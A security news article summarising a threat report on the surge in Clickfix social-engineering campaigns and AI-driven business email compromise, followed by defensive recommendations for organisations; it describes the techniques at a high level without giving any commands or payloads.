Your hard-won phishing survival instincts are only marginally useful to you in the face of the security threats that are currently crashing like a tsunami over corporate networks. CNTT: 70% of threat actors are bypassing lures and “going after the human layer itself” with new tactics, leveraging Clickfix social engineering as their favorite weapon to transform the everyday worker into an unwitting insider — or using AI-powered business email compromise.
In its most recent Global Threat Intelligence Report, Mimecast reports that there has been a 500 per cent spike in Clickfix-style campaigns in the latest reporting period and they now account for around eight per cent of all observed attacks. The approach is catching on because it does not depend on malware-laden attachments or suspicious links. It convinces the recipient to do the work themselves.
Security advisories from leading players, such as Microsoft, support the trend: attackers are leveraging “living off the land” techniques and abusing remote monitoring and management tools in order to achieve an initial foothold, with social engineering at the heart of the playbook.
The Human Bypass at the Heart of Clickfix
Clickfix campaigns replace the old “click this link” with “fix this problem.” Victims are presented with a believable error message or help prompt along with step-by-step instructions telling them to launch an onboard tool like PowerShell and paste a command. That one click retrieves and runs a payload — from information stealers to ransomware — all while cleverly dodging many email and web filters.
It works because it leverages two reliable behaviors: our inclination to resolve problems as quickly as we can, and the trust we have in native system utilities. Training users to spot bad links or attachments doesn’t even cover this vector, and endpoint controls all too commonly let the very tools these campaigns weaponize onto your network.
AI Turns BEC Into a Full-Cast Social Engineering Production
Attackers are also leveraging generative AI to create entire email conversations that impersonate executives, vendors and outside counsel. Instead of one phishing message there’s a thread with context, artifacts and urgency that looks and feels like something you’re already working on.
Deepfake voice (and even brief video) is being added to the mix in order to seal the deal for invoice payments, bank detail change requests, payroll updates and wire transfers. AI is able to change wording and tone on the fly to evade content-based detection and reflect back the language of an actual finance team or supplier.
The Internet Crime Complaint Center of the F.B.I. has listed BEC as the most expensive category of cybercrime with more than a billion dollars in reported losses. As AI reduces the barriers to creating convincing dialogue and persona takeovers, there will be more of both — by volume and score.
Sectors in the Crosshairs for Social Engineering and BEC
Mimecast reflects heightened risk for the education, IT services, telecommunications, legal practice and real estate industries — sectors that conduct time-sensitive transactions, and hold confidential client or financial information. Real estate, for instance, continues to experience a steady increase in social engineering as criminals pursue high-dollar, deadline-driven closings.
Groups such as Scattered Spider and TA2541 have also been associated with campaigns that rely strongly on social engineering and abuse of remote tools for footholds, which highlights how malwareless initial access has reached the mainstream.
Why Old Filters Are No Longer Cutting It
Traditional defenses operate on the principle that malicious artifacts seem foreign. Clickfix blurs that line by directing a human to use trusted elements of the system, with few clear signs for email gateways to detect. In the meantime, content whose creation has been automated using AI erodes telltale signs of fakery — awkward grammar, mismatched style — that users had been trained to recognize.
The Verizon Data Breach Investigations Report consistently reveals that the majority of breaches have a human element. The takeaway is inescapable: vigilance counts for something, but asking users to be sophisticated enough to spot every trick is not only unfair; it’s not even going to work against opponents who iterate faster than awareness programs.
Defensive Moves That Work Against Clickfix and AI-Driven BEC
- Shrink the blast radius with hard controls: minimize scripted and admin tools via policy, enable PowerShell Constrained Language Mode, block unknown RMM software, and condition endpoint detection for “living off the land” behaviors — e.g., suspicious command launches or child processes. Break out critical systems and lock outbound egress to shut down command-and-control.
- Elevate your payment and vendor change bar with out-of-band verification, multi-person approvals, and branching account checks that can’t be skirted by timing email urgency requests.
- Reinforce email with DMARC enforcement, and lock down privileged access using least privilege and just-in-time elevation.
- Retrain with simulated scenarios based on Clickfix and AI-driven BEC. Train one simple rule: no reputable support channel will direct you to run code on your machine. Incentivize employees for being willing to slow down and escalate, rather than “solve” the problem. Track speed-to-report and containment, not just click rates.
Here are the takeaways from this latest threat intelligence: be phishing savvy and then some. The human layer needs layered controls and verified processes, combined with AI-aware detection to transform the human into a hard target versus their current status as the softest asset to attack.
